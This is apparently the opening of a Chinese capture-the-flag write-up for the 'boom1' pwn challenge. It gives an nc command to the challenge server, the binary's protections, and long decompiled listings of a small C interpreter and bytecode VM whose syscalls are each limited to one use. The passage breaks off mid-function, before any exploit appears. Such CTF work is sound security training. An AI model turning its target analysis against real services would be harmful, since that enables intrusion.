目录
boom1
Description:
nc 182.92.73.10 24573
Solution:
程序保护如下:
Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled
main 函数如下:
size_t __fastcall main(__int64 a1, char **a2, char **a3)
{
size_t result; // rax
void *v4; // rdi
signed __int64 v5; // rax
signed __int64 v6; // rax
void *v7; // rsi
__int64 v8; // rax
__int64 v9; // rax
signed __int64 *v10; // ST28_8
signed __int64 *v11; // ST60_8
signed __int64 *v12; // rax
signed __int64 *v13; // rax
signed __int64 *v14; // rax
signed __int64 v15; // rax
signed __int64 v16; // rax
signed __int64 *v17; // ST28_8
signed __int64 *v18; // rax
signed __int64 *v19; // rax
signed __int64 v20; // ST28_8
signed __int64 **v21; // rax
signed __int64 **v22; // rax
signed __int64 *v23; // rax
_BYTE *v24; // rax
signed __int64 *v25; // rax
signed __int64 *v26; // rax
signed __int64 *v27; // rax
signed __int64 *v28; // rax
signed __int64 *v29; // rax
signed __int64 *v30; // rax
signed __int64 *v31; // rax
signed __int64 *v32; // rax
signed __int64 *v33; // rax
signed __int64 *v34; // rax
signed __int64 *v35; // rax
signed __int64 *v36; // rax
signed __int64 *v37; // rax
signed __int64 *v38; // rax
signed __int64 *v39; // rax
signed __int64 *v40; // rax
__int64 v41; // rax
__int64 v42; // rax
__int64 v43; // rax
__int64 v44; // rax
__int64 v45; // rax
__int64 v46; // rax
__int64 v47; // rax
__int64 v48; // rax
signed __int64 v49; // ST60_8
__int64 v50; // rax
__int64 v51; // rax
char **v52; // [rsp+0h] [rbp-70h]
signed __int64 v53; // [rsp+8h] [rbp-68h]
_BOOL8 v54; // [rsp+10h] [rbp-60h]
__int64 v55; // [rsp+18h] [rbp-58h]
signed __int64 v56; // [rsp+18h] [rbp-58h]
__int64 v57; // [rsp+18h] [rbp-58h]
signed __int64 *v58; // [rsp+20h] [rbp-50h]
char *v59; // [rsp+28h] [rbp-48h]
signed __int64 *v60; // [rsp+28h] [rbp-48h]
signed __int64 *v61; // [rsp+30h] [rbp-40h]
signed __int64 v62; // [rsp+38h] [rbp-38h]
__int64 v63; // [rsp+40h] [rbp-30h]
signed __int64 v64; // [rsp+48h] [rbp-28h]
signed __int64 v65; // [rsp+48h] [rbp-28h]
ssize_t v66; // [rsp+48h] [rbp-28h]
__int64 v67; // [rsp+48h] [rbp-28h]
__int64 v68; // [rsp+48h] [rbp-28h]
signed __int64 v69; // [rsp+48h] [rbp-28h]
signed __int64 v70; // [rsp+48h] [rbp-28h]
__int64 v71; // [rsp+58h] [rbp-18h]
setbuf(stdout, 0LL);
setbuf(stdin, 0LL);
setbuf(stderr, 0LL);
v53 = a1 - 1;
v52 = a2 + 1;
s = malloc(0x40000uLL);
if ( !s )
{
printf("could not malloc(%d) symbol area\n", 0x40000LL, v52, v53);
return -1LL;
}
qword_206088 = malloc(0x40000uLL);
qword_206068 = (__int64)qword_206088;
if ( !qword_206088 )
{
printf("could not malloc(%d) text area\n", 0x40000LL, v52, v53);
return -1LL;
}
qword_206080 = malloc(0x40000uLL);
if ( !qword_206080 )
{
printf("could not malloc(%d) data area\n", 0x40000LL, v52, v53);
return -1LL;
}
v59 = (char *)malloc(0x40000uLL);
if ( !v59 )
{
printf("could not malloc(%d) stack area\n", 0x40000LL, v52, v53);
return -1LL;
}
memset(s, 0, 0x40000uLL);
memset(qword_206088, 0, 0x40000uLL);
v4 = qword_206080;
memset(qword_206080, 0, 0x40000uLL);
buf = "char else enum if int return sizeof while open read write close puts malloc free printf memset memcmp exit void main";
v64 = 134LL;
while ( v64 <= 141 )
{
((void (*)(void))sub_B70)();
v5 = v64++;
*(_QWORD *)qword_2060B8 = v5;
}
v65 = 30LL;
while ( v65 <= 40 )
{
((void (*)(void))sub_B70)();
*(_QWORD *)(qword_2060B8 + 24) = 130LL;
*(_QWORD *)(qword_2060B8 + 32) = 1LL;
v6 = v65++;
*(_QWORD *)(qword_2060B8 + 40) = v6;
}
sub_B70(v4, 0LL);
*(_QWORD *)qword_2060B8 = 134LL;
sub_B70(v4, 0LL);
v71 = qword_2060B8;
buf = malloc(0x40000uLL);
qword_2060A0 = (__int64)buf;
if ( !buf )
{
printf("could not malloc(%d) source area\n", 0x40000LL, v52, v53);
return -1LL;
}
puts("I'm living...");
v7 = buf;
v66 = read(0, buf, 0x3FFFFuLL);
if ( v66 <= 0 )
{
printf("read() returned %d\n", v66, v52, v53);
return -1LL;
}
*((_BYTE *)buf + v66) = 0;
qword_206098 = 1LL;
sub_B70(0LL, v7);
while ( qword_206070 )
{
v54 = 1LL;
switch ( qword_206070 )
{
case 138LL:
sub_B70(0LL, v7);
break;
case 134LL:
sub_B70(0LL, v7);
v54 = 0LL;
break;
case 136LL:
sub_B70(0LL, v7);
if ( qword_206070 != 123 )
sub_B70(0LL, v7);
if ( qword_206070 == 123 )
{
sub_B70(0LL, v7);
v67 = 0LL;
while ( 1 )
{
if ( qword_206070 == 125 )
{
sub_B70(0LL, v7);
goto LABEL_90;
}
if ( qword_206070 != 133 )
{
printf("%d: bad enum identifier %d\n", qword_206098, qword_206070, v52, v53);
return -1LL;
}
sub_B70(0LL, v7);
if ( qword_206070 == 142 )
{
sub_B70(0LL, v7);
if ( qword_206070 != 128 )
{
printf("%d: bad enum initializer\n", qword_206098, v52, v53);
return -1LL;
}
v67 = qword_2060A8;
sub_B70(0LL, v7);
}
*(_QWORD *)(qword_2060B8 + 24) = 128LL;
*(_QWORD *)(qword_2060B8 + 32) = 1LL;
v8 = v67++;
*(_QWORD *)(qword_2060B8 + 40) = v8;
if ( qword_206070 == 44 )
sub_B70(0LL, v7);
}
}
break;
}
LABEL_90:
while ( qword_206070 != 59 && qword_206070 != 125 )
{
v55 = v54;
while ( qword_206070 == 159 )
{
sub_B70(0LL, v7);
v55 += 2LL;
}
if ( qword_206070 != 133 )
{
printf("%d: bad global declaration\n", qword_206098, v52, v53);
return -1LL;
}
if ( *(_QWORD *)(qword_2060B8 + 24) )
{
printf("%d: duplicate global definition\n", qword_206098, v52, v53);
return -1LL;
}
sub_B70(0LL, v7);
*(_QWORD *)(qword_2060B8 + 32) = v55;
if ( qword_206070 == 40 )
{
*(_QWORD *)(qword_2060B8 + 24) = 129LL;
*(_QWORD *)(qword_2060B8 + 40) = (char *)qword_206088 + 8;
sub_B70(0LL, v7);
v68 = 0LL;
while ( qword_206070 != 41 )
{
v56 = 1LL;
if ( qword_206070 == 138 )
{
sub_B70(0LL, v7);
}
else if ( qword_206070 == 134 )
{
sub_B70(0LL, v7);
v56 = 0LL;
}
while ( qword_206070 == 159 )
{
sub_B70(0LL, v7);
v56 += 2LL;
}
if ( qword_206070 != 133 )
{
printf("%d: bad parameter declaration\n", qword_206098, v52, v53);
return -1LL;
}
if ( *(_QWORD *)(qword_2060B8 + 24) == 132LL )
{
printf("%d: duplicate parameter definition\n", qword_206098, v52, v53);
return -1LL;
}
*(_QWORD *)(qword_2060B8 + 48) = *(_QWORD *)(qword_2060B8 + 24);
*(_QWORD *)(qword_2060B8 + 24) = 132LL;
*(_QWORD *)(qword_2060B8 + 56) = *(_QWORD *)(qword_2060B8 + 32);
*(_QWORD *)(qword_2060B8 + 32) = v56;
*(_QWORD *)(qword_2060B8 + 64) = *(_QWORD *)(qword_2060B8 + 40);
v9 = v68++;
*(_QWORD *)(qword_2060B8 + 40) = v9;
sub_B70(0LL, v7);
if ( qword_206070 == 44 )
sub_B70(0LL, v7);
}
sub_B70(0LL, v7);
if ( qword_206070 != 123 )
{
printf("%d: bad function definition\n", qword_206098, v52, v53);
return -1LL;
}
v69 = v68 + 1;
qword_206090 = v69;
sub_B70(0LL, v7);
while ( qword_206070 == 138 || qword_206070 == 134 )
{
v54 = qword_206070 == 138;
sub_B70(0LL, v7);
while ( qword_206070 != 59 )
{
v57 = v54;
while ( qword_206070 == 159 )
{
sub_B70(0LL, v7);
v57 += 2LL;
}
if ( qword_206070 != 133 )
{
printf("%d: bad local declaration\n", qword_206098, v52, v53);
return -1LL;
}
if ( *(_QWORD *)(qword_2060B8 + 24) == 132LL )
{
printf("%d: duplicate local definition\n", qword_206098, v52, v53);
return -1LL;
}
*(_QWORD *)(qword_2060B8 + 48) = *(_QWORD *)(qword_2060B8 + 24);
*(_QWORD *)(qword_2060B8 + 24) = 132LL;
*(_QWORD *)(qword_2060B8 + 56) = *(_QWORD *)(qword_2060B8 + 32);
*(_QWORD *)(qword_2060B8 + 32) = v57;
*(_QWORD *)(qword_2060B8 + 64) = *(_QWORD *)(qword_2060B8 + 40);
*(_QWORD *)(qword_2060B8 + 40) = ++v69;
sub_B70(0LL, v7);
if ( qword_206070 == 44 )
sub_B70(0LL, v7);
}
sub_B70(0LL, v7);
}
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 6LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = v69 - qword_206090;
while ( qword_206070 != 125 )
sub_3457();
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 8LL;
for ( qword_2060B8 = (__int64)s; *(_QWORD *)qword_2060B8; qword_2060B8 += 72LL )
{
if ( *(_QWORD *)(qword_2060B8 + 24) == 132LL )
{
*(_QWORD *)(qword_2060B8 + 24) = *(_QWORD *)(qword_2060B8 + 48);
*(_QWORD *)(qword_2060B8 + 32) = *(_QWORD *)(qword_2060B8 + 56);
*(_QWORD *)(qword_2060B8 + 40) = *(_QWORD *)(qword_2060B8 + 64);
}
}
}
else
{
*(_QWORD *)(qword_2060B8 + 24) = 131LL;
*(_QWORD *)(qword_2060B8 + 40) = qword_206080;
qword_206080 = (char *)qword_206080 + 8;
}
if ( qword_206070 == 44 )
sub_B70(0LL, v7);
}
sub_B70(0LL, v7);
}
v58 = *(signed __int64 **)(v71 + 40);
if ( v58 )
{
if ( qword_206060 )
{
result = 0LL;
}
else
{
v10 = (signed __int64 *)(v59 + 0x40000);
v61 = v10;
--v10;
*v10 = 40LL;
--v10;
*v10 = 13LL;
v11 = v10;
--v10;
*v10 = v53;
--v10;
*v10 = (signed __int64)v52;
v60 = v10 - 1;
*v60 = (signed __int64)v11;
v63 = 0LL;
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
v12 = v58;
++v58;
v70 = *v12;
if ( ++v63 > 100 )
{
puts("NOTALLOW");
exit(0);
}
if ( qword_206058 )
{
printf(
"%d> %.4s",
v63,
&aLeaImmJmpJsrBz_0[5 * v70],
v52,
v53);
if ( v70 > 7 )
putchar(10);
else
printf(" %d\n", *v58);
}
if ( v70 )
break;
v13 = v58;
++v58;
v62 = (signed __int64)&v61[*v13];
}
if ( v70 != 1 )
break;
v14 = v58;
++v58;
v62 = *v14;
}
if ( v70 != 2 )
break;
v58 = (signed __int64 *)*v58;
}
if ( v70 != 3 )
break;
--v60;
*v60 = (signed __int64)(v58 + 1);
v58 = (signed __int64 *)*v58;
}
if ( v70 != 4 )
break;
if ( v62 )
v15 = (signed __int64)(v58 + 1);
else
v15 = *v58;
v58 = (signed __int64 *)v15;
}
if ( v70 != 5 )
break;
if ( v62 )
v16 = *v58;
else
v16 = (signed __int64)(v58 + 1);
v58 = (signed __int64 *)v16;
}
if ( v70 != 6 )
break;
v17 = v60 - 1;
*v17 = (signed __int64)v61;
v61 = v17;
v18 = v58;
++v58;
v60 = &v17[-*v18];
}
if ( v70 != 7 )
break;
v19 = v58;
++v58;
v60 += *v19;
}
if ( v70 != 8 )
break;
v20 = (signed __int64)(v61 + 1);
v61 = (signed __int64 *)*v61;
v21 = (signed __int64 **)v20;
v60 = (signed __int64 *)(v20 + 8);
v58 = *v21;
}
if ( v70 != 9 )
break;
v62 = *(_QWORD *)v62;
}
if ( v70 != 10 )
break;
v62 = *(char *)v62;
}
if ( v70 != 11 )
break;
v22 = (signed __int64 **)v60;
++v60;
**v22 = v62;
}
if ( v70 != 12 )
break;
v23 = v60;
++v60;
v24 = (_BYTE *)*v23;
*v24 = v62;
v62 = (char)*v24;
}
if ( v70 != 13 )
break;
--v60;
*v60 = v62;
}
if ( v70 != 14 )
break;
v25 = v60;
++v60;
v62 |= *v25;
}
if ( v70 != 15 )
break;
v26 = v60;
++v60;
v62 ^= *v26;
}
if ( v70 != 16 )
break;
v27 = v60;
++v60;
v62 &= *v27;
}
if ( v70 != 17 )
break;
v28 = v60;
++v60;
v62 = *v28 == v62;
}
if ( v70 != 18 )
break;
v29 = v60;
++v60;
v62 = *v29 != v62;
}
if ( v70 != 19 )
break;
v30 = v60;
++v60;
v62 = *v30 < v62;
}
if ( v70 != 20 )
break;
v31 = v60;
++v60;
v62 = *v31 > v62;
}
if ( v70 != 21 )
break;
v32 = v60;
++v60;
v62 = *v32 <= v62;
}
if ( v70 != 22 )
break;
v33 = v60;
++v60;
v62 = *v33 >= v62;
}
if ( v70 != 23 )
break;
v34 = v60;
++v60;
v62 = *v34 << v62;
}
if ( v70 != 24 )
break;
v35 = v60;
++v60;
v62 = *v35 >> v62;
}
if ( v70 != 25 )
break;
v36 = v60;
++v60;
v62 += *v36;
}
if ( v70 != 26 )
break;
v37 = v60;
++v60;
v62 = *v37 - v62;
}
if ( v70 != 27 )
break;
v38 = v60;
++v60;
v62 *= *v38;
}
if ( v70 != 28 )
break;
v39 = v60;
++v60;
v62 = *v39 / v62;
}
if ( v70 != 29 )
break;
v40 = v60;
++v60;
v62 = *v40 % v62;
}
if ( v70 != 30 )
break;
v41 = qword_206010--;
if ( v41 != 1 )
{
puts("NOTALLOW");
exit(0);
}
v62 = open((const char *)v60[1], *v60, v52, v53);
}
if ( v70 != 31 )
break;
v42 = qword_206010--;
if ( v42 != 1 )
{
puts("NOTALLOW");
exit(0);
}
v62 = read(v60[2], (void *)v60[1], *v60);
}
if ( v70 != 32 )
break;
v43 = qword_206010--;
if ( v43 != 1 )
{
puts("NOTALLOW");
exit(0);
}
v62 = write(v60[2], (const void *)v60[1], *v60);
}
if ( v70 != 33 )
break;
v44 = qword_206010--;
if ( v44 != 1 )
{
puts("NOTALLOW");
exit(0);
}
v62 = close(*v60);
}
if ( v70 != 34 )
break;
v45 = qword_206010--;
if ( v45 != 1 )
{
puts("NOTALLOW");
exit(0);
}
puts((const char *)*v60);
}
if ( v70 != 35 )
break;
v46 = qword_206010--;
if ( v46 != 1 )
{
puts("NOTALLOW");
exit(0);
}
v62 = (signed __int64)malloc(*v60);
}
if ( v70 != 36 )
break;
v47 = qword_206010--;
if ( v47 != 1 )
{
puts("NOTALLOW");
exit(0);
}
free((void *)*v60);
}
if ( v70 != 37 )
break;
v48 = qword_206010--;
if ( v48 != 1 )
{
puts("NOTALLOW");
exit(0);
}
v49 = (signed __int64)&v60[v58[1]];
v62 = printf(
*(const char **)(v49 - 8),
*(_QWORD *)(v49 - 16),
*(_QWORD *)(v49 - 24),
*(_QWORD *)(v49 - 32),
*(_QWORD *)(v49 - 40),
*(_QWORD *)(v49 - 48),
v52,
v53);
}
if ( v70 != 38 )
break;
v50 = qword_206010--;
if ( v50 != 1 )
{
puts("NOTALLOW");
exit(0);
}
v62 = (signed __int64)memset((void *)v60[2], v60[1], *v60);
}
if ( v70 != 39 )
break;
v51 = qword_206010--;
if ( v51 != 1 )
{
puts("NOTALLOW");
exit(0);
}
v62 = memcmp((const void *)v60[2], (const void *)v60[1], *v60);
}
if ( v70 == 40 )
{
printf("exit(%d) cycle = %d\n", *v60, v63, v52, v53);
result = *v60;
}
else
{
printf("unknown instruction = %d! cycle = %d\n", v70, v63, v52, v53);
result = -1LL;
}
}
}
else
{
puts("main() not defined");
result = -1LL;
}
return result;
}
sub_B70 函数如下:
unsigned __int64 sub_B70()
{
char *v0; // rax
__int64 *v1; // rax
char *v2; // rax
signed __int64 v3; // rax
char *v4; // rax
char *v5; // rax
char *v6; // rax
_BYTE *v7; // rax
char *s2; // [rsp+0h] [rbp-10h]
void *s2a; // [rsp+0h] [rbp-10h]
unsigned __int64 v11; // [rsp+8h] [rbp-8h]
v11 = __readfsqword(0x28u);
while ( 1 )
{
qword_206070 = *(char *)buf;
if ( !qword_206070 )
break;
buf = (char *)buf + 1;
if ( qword_206070 == 10 )
{
if ( qword_206060 )
{
printf("%d: %.*s", qword_206098, (char *)buf - qword_2060A0, qword_2060A0);
qword_2060A0 = (__int64)buf;
while ( qword_206068 < (unsigned __int64)qword_206088 )
{
qword_206068 += 8LL;
printf("%8.4s", &aLeaImmJmpJsrBz[5 * *(_QWORD *)qword_206068]);
if ( *(_QWORD *)qword_206068 > 7LL )
{
putchar(10);
}
else
{
qword_206068 += 8LL;
printf(" %d\n", *(_QWORD *)qword_206068);
}
}
}
++qword_206098;
}
else if ( qword_206070 == 35 )
{
while ( *(_BYTE *)buf && *(_BYTE *)buf != 10 )
buf = (char *)buf + 1;
}
else
{
if ( qword_206070 > 96 && qword_206070 <= 122 || qword_206070 > 64 && qword_206070 <= 90 || qword_206070 == 95 )
{
s2 = (char *)buf - 1;
while ( *(_BYTE *)buf > 96 && *(_BYTE *)buf <= 122
|| *(_BYTE *)buf > 64 && *(_BYTE *)buf <= 90
|| *(_BYTE *)buf > 47 && *(_BYTE *)buf <= 57
|| *(_BYTE *)buf == 95 )
{
v0 = (char *)buf;
buf = (char *)buf + 1;
qword_206070 = 147 * qword_206070 + *v0;
}
qword_206070 = (qword_206070 << 6) + (_BYTE *)buf - s2;
for ( qword_2060B8 = (__int64)s; *(_QWORD *)qword_2060B8; qword_2060B8 += 72LL )
{
if ( *(_QWORD *)(qword_2060B8 + 8) == qword_206070
&& !memcmp(*(const void **)(qword_2060B8 + 16), s2, (_BYTE *)buf - s2) )
{
qword_206070 = *(_QWORD *)qword_2060B8;
return __readfsqword(0x28u) ^ v11;
}
}
*(_QWORD *)(qword_2060B8 + 16) = s2;
*(_QWORD *)(qword_2060B8 + 8) = qword_206070;
v1 = (__int64 *)qword_2060B8;
*(_QWORD *)qword_2060B8 = 133LL;
qword_206070 = *v1;
return __readfsqword(0x28u) ^ v11;
}
if ( qword_206070 > 47 && qword_206070 <= 57 )
{
qword_2060A8 = qword_206070 - 48;
if ( qword_206070 == 48 )
{
if ( *(_BYTE *)buf != 120 && *(_BYTE *)buf != 88 )
{
while ( *(_BYTE *)buf > 47 && *(_BYTE *)buf <= 55 )
{
v4 = (char *)buf;
buf = (char *)buf + 1;
qword_2060A8 = 8 * qword_2060A8 + *v4 - 48;
}
}
else
{
while ( 1 )
{
buf = (char *)buf + 1;
qword_206070 = *(char *)buf;
if ( !qword_206070
|| (qword_206070 <= 47 || qword_206070 > 57)
&& (qword_206070 <= 96 || qword_206070 > 102)
&& (qword_206070 <= 64 || qword_206070 > 70) )
{
break;
}
if ( qword_206070 <= 64 )
v3 = 0LL;
else
v3 = 9LL;
qword_2060A8 = (qword_206070 & 0xF) + 16 * qword_2060A8 + v3;
}
}
}
else
{
while ( *(_BYTE *)buf > 47 && *(_BYTE *)buf <= 57 )
{
v2 = (char *)buf;
buf = (char *)buf + 1;
qword_2060A8 = 10 * qword_2060A8 + *v2 - 48;
}
}
qword_206070 = 128LL;
return __readfsqword(0x28u) ^ v11;
}
switch ( qword_206070 )
{
case 47LL:
if ( *(_BYTE *)buf != 47 )
{
qword_206070 = 160LL;
return __readfsqword(0x28u) ^ v11;
}
for ( buf = (char *)buf + 1; *(_BYTE *)buf && *(_BYTE *)buf != 10; buf = (char *)buf + 1 )
;
break;
case 39LL:
case 34LL:
s2a = qword_206080;
while ( *(_BYTE *)buf && *(char *)buf != qword_206070 )
{
v5 = (char *)buf;
buf = (char *)buf + 1;
qword_2060A8 = *v5;
if ( qword_2060A8 == 92 )
{
v6 = (char *)buf;
buf = (char *)buf + 1;
qword_2060A8 = *v6;
if ( qword_2060A8 == 110 )
qword_2060A8 = 10LL;
}
if ( qword_206070 == 34 )
{
v7 = qword_206080;
qword_206080 = (char *)qword_206080 + 1;
*v7 = qword_2060A8;
}
}
buf = (char *)buf + 1;
if ( qword_206070 == 34 )
qword_2060A8 = (__int64)s2a;
else
qword_206070 = 128LL;
return __readfsqword(0x28u) ^ v11;
case 61LL:
if ( *(_BYTE *)buf == 61 )
{
buf = (char *)buf + 1;
qword_206070 = 149LL;
}
else
{
qword_206070 = 142LL;
}
return __readfsqword(0x28u) ^ v11;
case 43LL:
if ( *(_BYTE *)buf == 43 )
{
buf = (char *)buf + 1;
qword_206070 = 162LL;
}
else
{
qword_206070 = 157LL;
}
return __readfsqword(0x28u) ^ v11;
case 45LL:
if ( *(_BYTE *)buf == 45 )
{
buf = (char *)buf + 1;
qword_206070 = 163LL;
}
else
{
qword_206070 = 158LL;
}
return __readfsqword(0x28u) ^ v11;
case 33LL:
if ( *(_BYTE *)buf == 61 )
{
buf = (char *)buf + 1;
qword_206070 = 150LL;
}
return __readfsqword(0x28u) ^ v11;
case 60LL:
if ( *(_BYTE *)buf == 61 )
{
buf = (char *)buf + 1;
qword_206070 = 153LL;
}
else if ( *(_BYTE *)buf == 60 )
{
buf = (char *)buf + 1;
qword_206070 = 155LL;
}
else
{
qword_206070 = 151LL;
}
return __readfsqword(0x28u) ^ v11;
case 62LL:
if ( *(_BYTE *)buf == 61 )
{
buf = (char *)buf + 1;
qword_206070 = 154LL;
}
else if ( *(_BYTE *)buf == 62 )
{
buf = (char *)buf + 1;
qword_206070 = 156LL;
}
else
{
qword_206070 = 152LL;
}
return __readfsqword(0x28u) ^ v11;
case 124LL:
if ( *(_BYTE *)buf == 124 )
{
buf = (char *)buf + 1;
qword_206070 = 144LL;
}
else
{
qword_206070 = 146LL;
}
return __readfsqword(0x28u) ^ v11;
case 38LL:
if ( *(_BYTE *)buf == 38 )
{
buf = (char *)buf + 1;
qword_206070 = 145LL;
}
else
{
qword_206070 = 148LL;
}
return __readfsqword(0x28u) ^ v11;
case 94LL:
qword_206070 = 147LL;
return __readfsqword(0x28u) ^ v11;
case 37LL:
qword_206070 = 161LL;
return __readfsqword(0x28u) ^ v11;
case 42LL:
qword_206070 = 159LL;
return __readfsqword(0x28u) ^ v11;
case 91LL:
qword_206070 = 164LL;
return __readfsqword(0x28u) ^ v11;
case 63LL:
qword_206070 = 143LL;
return __readfsqword(0x28u) ^ v11;
case 126LL:
case 59LL:
case 123LL:
case 125LL:
case 40LL:
case 41LL:
case 93LL:
case 44LL:
case 58LL:
return __readfsqword(0x28u) ^ v11;
}
}
}
return __readfsqword(0x28u) ^ v11;
}
sub_3457 函数如下:
unsigned __int64 sub_3457()
{
_QWORD *v0; // ST08_8
_QWORD *v2; // [rsp+8h] [rbp-18h]
char *v3; // [rsp+10h] [rbp-10h]
unsigned __int64 v4; // [rsp+18h] [rbp-8h]
v4 = __readfsqword(0x28u);
switch ( qword_206070 )
{
case 137LL:
sub_B70();
if ( qword_206070 != 40 )
{
printf("%d: open paren expected\n", qword_206098);
exit(-1);
}
sub_B70();
sub_16CB(142LL);
if ( qword_206070 != 41 )
{
printf("%d: close paren expected\n", qword_206098);
exit(-1);
}
sub_B70();
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 4LL;
qword_206088 = (char *)qword_206088 + 8;
v2 = qword_206088;
sub_3457(142LL);
if ( qword_206070 == 135 )
{
*v2 = (char *)qword_206088 + 24;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 2LL;
qword_206088 = (char *)qword_206088 + 8;
v2 = qword_206088;
sub_B70();
sub_3457(142LL);
}
*v2 = (char *)qword_206088 + 8;
break;
case 141LL:
sub_B70();
v3 = (char *)qword_206088 + 8;
if ( qword_206070 != 40 )
{
printf("%d: open paren expected\n", qword_206098);
exit(-1);
}
sub_B70();
sub_16CB(142LL);
if ( qword_206070 != 41 )
{
printf("%d: close paren expected\n", qword_206098);
exit(-1);
}
sub_B70();
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 4LL;
qword_206088 = (char *)qword_206088 + 8;
v0 = qword_206088;
sub_3457(142LL);
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 2LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = v3;
*v0 = (char *)qword_206088 + 8;
break;
case 139LL:
sub_B70();
if ( qword_206070 != 59 )
sub_16CB(142LL);
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 8LL;
if ( qword_206070 != 59 )
{
printf("%d: semicolon expected\n", qword_206098);
exit(-1);
}
sub_B70();
break;
case 123LL:
sub_B70();
while ( qword_206070 != 125 )
((void (*)(void))sub_3457)();
sub_B70();
break;
case 59LL:
sub_B70();
break;
default:
sub_16CB(142LL);
if ( qword_206070 != 59 )
{
printf("%d: semicolon expected\n", qword_206098);
exit(-1);
}
sub_B70();
break;
}
return __readfsqword(0x28u) ^ v4;
}
sub_16CB 函数如下:
unsigned __int64 __fastcall sub_16CB(__int64 a1)
{
signed __int64 v1; // rdx
signed __int64 v2; // rdx
signed __int64 v3; // rdx
signed __int64 v4; // rdx
signed __int64 v5; // rdx
signed __int64 v6; // rdx
signed __int64 v7; // rdx
_QWORD *v8; // ST20_8
_QWORD *v9; // ST20_8
_QWORD *v10; // ST20_8
signed __int64 v11; // rdx
signed __int64 v12; // rdx
signed __int64 v13; // rdx
signed __int64 v14; // rdx
signed __int64 v15; // rdx
signed __int64 v16; // rdx
__int64 v18; // [rsp+18h] [rbp-18h]
__int64 v19; // [rsp+18h] [rbp-18h]
__int64 v20; // [rsp+18h] [rbp-18h]
signed __int64 v21; // [rsp+18h] [rbp-18h]
_QWORD *v22; // [rsp+20h] [rbp-10h]
_QWORD *v23; // [rsp+20h] [rbp-10h]
unsigned __int64 v24; // [rsp+28h] [rbp-8h]
v24 = __readfsqword(0x28u);
if ( !qword_206070 )
{
printf("%d: unexpected eof in expression\n", qword_206098);
exit(-1);
}
switch ( qword_206070 )
{
case 128LL:
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 1LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = qword_2060A8;
sub_B70();
qword_206078 = 1LL;
break;
case 34LL:
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 1LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = qword_2060A8;
sub_B70();
while ( qword_206070 == 34 )
sub_B70();
qword_206080 = (void *)(((unsigned __int64)qword_206080 + 8) & 0xFFFFFFFFFFFFFFF8LL);
qword_206078 = 2LL;
break;
case 140LL:
sub_B70();
if ( qword_206070 != 40 )
{
printf("%d: open paren expected in sizeof\n", qword_206098);
exit(-1);
}
sub_B70();
qword_206078 = 1LL;
if ( qword_206070 == 138 )
{
sub_B70();
}
else if ( qword_206070 == 134 )
{
sub_B70();
qword_206078 = 0LL;
}
while ( qword_206070 == 159 )
{
sub_B70();
qword_206078 += 2LL;
}
if ( qword_206070 != 41 )
{
printf("%d: close paren expected in sizeof\n", qword_206098);
exit(-1);
}
sub_B70();
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 1LL;
qword_206088 = (char *)qword_206088 + 8;
if ( qword_206078 )
v1 = 8LL;
else
v1 = 1LL;
*(_QWORD *)qword_206088 = v1;
qword_206078 = 1LL;
break;
case 133LL:
v22 = (_QWORD *)qword_2060B8;
sub_B70();
if ( qword_206070 == 40 )
{
sub_B70();
v18 = 0LL;
while ( qword_206070 != 41 )
{
sub_16CB(142LL);
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 13LL;
++v18;
if ( qword_206070 == 44 )
sub_B70();
}
sub_B70();
if ( v22[3] == 130LL )
{
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = v22[5];
}
else
{
if ( v22[3] != 129LL )
{
printf("%d: bad function call\n", qword_206098);
exit(-1);
}
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 3LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = v22[5];
}
if ( v18 )
{
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 7LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = v18;
}
qword_206078 = v22[4];
}
else if ( v22[3] == 128LL )
{
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 1LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = v22[5];
qword_206078 = 1LL;
}
else
{
if ( v22[3] == 132LL )
{
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 0LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = qword_206090 - v22[5];
}
else
{
if ( v22[3] != 131LL )
{
printf("%d: undefined variable\n", qword_206098);
exit(-1);
}
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = 1LL;
qword_206088 = (char *)qword_206088 + 8;
*(_QWORD *)qword_206088 = v22[5];
}
qword_206088 = (char *)qword_206088 + 8;
qword_206078 = v22[4];
